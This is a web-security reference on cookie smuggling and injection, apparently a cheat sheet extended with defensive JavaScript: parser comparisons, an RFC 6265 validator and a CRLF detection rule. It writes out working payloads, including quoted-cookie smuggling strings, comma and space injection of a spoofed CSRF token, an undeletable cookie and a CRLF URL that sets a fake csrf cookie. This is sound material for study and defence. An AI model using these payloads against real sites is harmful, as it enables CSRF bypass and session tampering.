What is Cookie Smuggling and Injection

Cookie smuggling and injection exploit frontend vulnerabilities and the way servers interpret cookies, enabling attackers to smuggle cookies or retrieve HTTPS cookies.

Blog Article: Here


Exploitation

Cookie Priority

# Default
1. Path length, longest to shortest
2. Last updated time, least recent to most recent

# Set Priority
- To take priority over a cookie already scoped to a specific path, URL-encode a "/" character in the path: the path string becomes longer, so the cookie sorts first, while the server decodes it to the same path.
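The ordering rule above, modelled as an added example (not code from the original page or the linked blog): the browser-side sort on raw path strings, and the server-side check a defender can run on the resulting Cookie header. The jar entries are constructed sample data; the functions are hypothetical helpers, not any framework's API.

```javascript
// Added example, not from the original page: models the browser-side ordering
// rule listed above (longest path first, then least recently created) and a
// server-side check for the symptom it produces. SAMPLE_JAR is constructed data.

// RFC 6265 path-match on the raw path strings (no percent-decoding), which is
// why a percent-encoded path counts as "longer" than its decoded equivalent.
function pathMatches(cookiePath, requestPath) {
  if (requestPath === cookiePath) return true;
  if (!requestPath.startsWith(cookiePath)) return false;
  return cookiePath.endsWith('/') || requestPath[cookiePath.length] === '/';
}

// Cookies in the order the browser would send them for requestPath.
function orderCookiesForRequest(jar, requestPath) {
  return jar
    .filter((c) => pathMatches(c.path, requestPath))
    .sort((a, b) => b.path.length - a.path.length || a.created - b.created);
}

// The resulting Cookie header; a server that keeps the first occurrence of a
// name sees the longest-path cookie's value.
function buildCookieHeader(jar, requestPath) {
  return orderCookiesForRequest(jar, requestPath)
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// Server-side check: the same name appearing twice means two cookies with
// different scopes are competing, which a legitimate Set-Cookie flow rarely
// produces. Log it rather than silently taking the first value.
function duplicateCookieNames(cookieHeader) {
  const counts = new Map();
  for (const pair of cookieHeader.split(';')) {
    const name = pair.trim().split('=')[0];
    if (name) counts.set(name, (counts.get(name) || 0) + 1);
  }
  return [...counts].filter(([, n]) => n > 1).map(([name]) => name);
}

// Constructed sample jar: 'created' is a monotonically increasing counter.
const SAMPLE_JAR = [
  { name: 'session', value: 'legit', path: '/', created: 1 },
  { name: 'session', value: 'shadow', path: '/app', created: 2 },
  { name: 'theme', value: 'dark', path: '/', created: 3 },
];

console.log(buildCookieHeader(SAMPLE_JAR, '/app/page'));
// session=shadow; session=legit; theme=dark
console.log(duplicateCookieNames(buildCookieHeader(SAMPLE_JAR, '/app/page')));
// [ 'session' ]
```

The sort compares `path.length` on the stored string, which is exactly why the encoded-"/" trick described above changes the order without changing the path the server sees.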

Cookie Delimitation

# Type of delimiter
- " (double quote)
- ; (semicolon)
- , (comma)
- [SPACE]

Cookie Smuggling & Injection

# Smuggling & Injection

## Smuggling
RENDER_TEXT="**hello world; JSESSIONID=13371337; ASDF=end**";  ---> Single cookie (attacker-controlled part in bold)

## Injection
LANGUAGE="**en-us" CSRF_TOKEN="SPOOFED_VALUE**"     ---> Inject cookie with space

LANGUAGE=**en-us,CSRF_TOKEN=SPOOFED_VALUE**         ---> Inject cookie with comma

- Smuggling: setting two quoted, attacker-controlled cookies on either side of a target cookie creates a "sandwich"; a quote-aware parser then treats all three as a single cookie value.
- Injection: lets an attacker inject extra cookies, overwriting existing ones to bypass CSRF-token checks.
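The delimiter list and the smuggling/injection examples above come down to how the server-side parser tokenises the Cookie header. The following is an added example (not code from the original page or the linked blog) that runs the page's own header strings through three parser styles and then through a strict validator a defender can apply before trusting any cookie; all function names are hypothetical.

```javascript
// Added example, not from the original page: three server-side readings of
// the same Cookie header, followed by a strict validator. Header strings are
// the text's own examples, used here as constructed input.

// Naive parser: split on ';' and '='. Quotes are not special, so a value that
// merely contains "; name=value" is read as extra cookies.
function parseNaive(header) {
  const out = {};
  for (const part of header.split(';')) {
    const idx = part.indexOf('=');
    if (idx < 0) continue;
    out[part.slice(0, idx).trim()] = part.slice(idx + 1).trim();
  }
  return out;
}

// Quote-aware parser: a double-quoted value may contain ';' and spaces, so
// the whole quoted run is read as ONE cookie (the "sandwich" behaviour).
function parseQuoteAware(header) {
  const out = {};
  let i = 0;
  while (i < header.length) {
    while (i < header.length && (header[i] === ';' || header[i] === ' ')) i++;
    const eq = header.indexOf('=', i);
    if (eq < 0) break;
    const name = header.slice(i, eq).trim();
    i = eq + 1;
    let value;
    if (header[i] === '"') {
      const close = header.indexOf('"', i + 1);
      value = close < 0 ? header.slice(i + 1) : header.slice(i + 1, close);
      i = close < 0 ? header.length : close + 1;
    } else {
      const end = header.indexOf(';', i);
      value = (end < 0 ? header.slice(i) : header.slice(i, end)).trim();
      i = end < 0 ? header.length : end;
    }
    out[name] = value;
  }
  return out;
}

// Lenient parser: ';', ',' and whitespace are all separators and surrounding
// quotes are stripped. This is the behaviour the injection examples rely on:
// CSRF_TOKEN comes out as its own cookie.
function parseLenient(header) {
  const out = {};
  for (const part of header.split(/[;,\s]+/)) {
    const idx = part.indexOf('=');
    if (idx < 0) continue;
    out[part.slice(0, idx)] = part.slice(idx + 1).replace(/^"|"$/g, '');
  }
  return out;
}

// Strict validator after RFC 6265 section 4.1.1: a cookie value may not
// contain whitespace, DQUOTE, comma, semicolon or backslash (an optional
// matching pair of quotes may wrap it). Rejecting the whole header on any
// violation removes the ambiguity that smuggling and injection depend on.
const COOKIE_NAME = /^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$/;
const COOKIE_VALUE = /^[!#$%&'()*+\-.\/0-9:<=>?@A-Z[\]^_`a-z{|}~]*$/;
function validateCookieHeader(header) {
  const problems = [];
  for (const part of header.split(';')) {
    const idx = part.indexOf('=');
    if (idx < 0) { problems.push(`no '=' in "${part.trim()}"`); continue; }
    const name = part.slice(0, idx).trim();
    let value = part.slice(idx + 1).trim();
    if (value.length >= 2 && value.startsWith('"') && value.endsWith('"')) {
      value = value.slice(1, -1);
    }
    if (!COOKIE_NAME.test(name)) problems.push(`bad name "${name}"`);
    if (!COOKIE_VALUE.test(value)) problems.push(`bad value for "${name}"`);
  }
  return problems;
}

const SMUGGLED = 'RENDER_TEXT="hello world; JSESSIONID=13371337; ASDF=end"';
console.log(parseNaive(SMUGGLED));       // three cookies, JSESSIONID included
console.log(parseQuoteAware(SMUGGLED));  // one cookie: RENDER_TEXT
console.log(validateCookieHeader(SMUGGLED)); // non-empty: header rejected
```

Run the same header through each parser to see the disagreement the text describes; the validator is the only one of the four that refuses to produce an answer, which is the behaviour to want at a trust boundary.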

## Extra
document.cookie = "�=meep";   ---> Cookie that can't be removed

---------------------------------------------------------------------------------
# Injection via URL (CRLF %0D%0A Injection)

/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None
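What that URL becomes once the server percent-decodes it, and the check to apply before any request-derived string is written into a response header, as an added example (not code from the original page or the linked blog). The URL is the page's own; the host name is a placeholder and the function names are hypothetical. Node's http module refuses CR/LF in header values on its own, but validating at the input boundary additionally lets the attempt be logged.

```javascript
// Added example, not from the original page: decoding of the text's URL and
// the defensive check/detection around it. ATTACK_URL is the page's example;
// 'placeholder.example' is a placeholder base for URL parsing.

// Value of a query parameter after percent-decoding, as a server framework
// would hand it to application code.
function queryParam(rawUrl, name) {
  return new URL(rawUrl, 'http://placeholder.example').searchParams.get(name);
}

// Reject any header value carrying CR, LF or other control characters; a
// single CRLF is enough to end the current header and start a new one.
function assertHeaderSafe(value) {
  if (/[\x00-\x1f\x7f]/.test(value)) {
    throw new Error('control character in header value');
  }
  return value;
}

// Detection rule over raw request targets as they appear in access logs: an
// encoded or literal CR/LF in the path or query is the signature of the
// technique, whichever header follows it.
function looksLikeCrlfInjection(rawUrl) {
  return /%0d|%0a|[\r\n]/i.test(rawUrl);
}

// Hardened version of echoing a search term back in a response header:
// returns the [name, value] pair or throws before anything is emitted.
function buildSearchHeader(rawUrl) {
  const term = queryParam(rawUrl, 'search') || '';
  return ['X-Search-Term', assertHeaderSafe(term)];
}

const ATTACK_URL = '/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None';
console.log(JSON.stringify(queryParam(ATTACK_URL, 'search')));
// "test\r\nSet-Cookie: csrf=fake; SameSite=None"
console.log(looksLikeCrlfInjection(ATTACK_URL)); // true
```

The decoded value already contains the line break that separates headers, which is why the check has to run on the decoded string, while the detection rule runs on the raw request line where the `%0d%0a` is still visible.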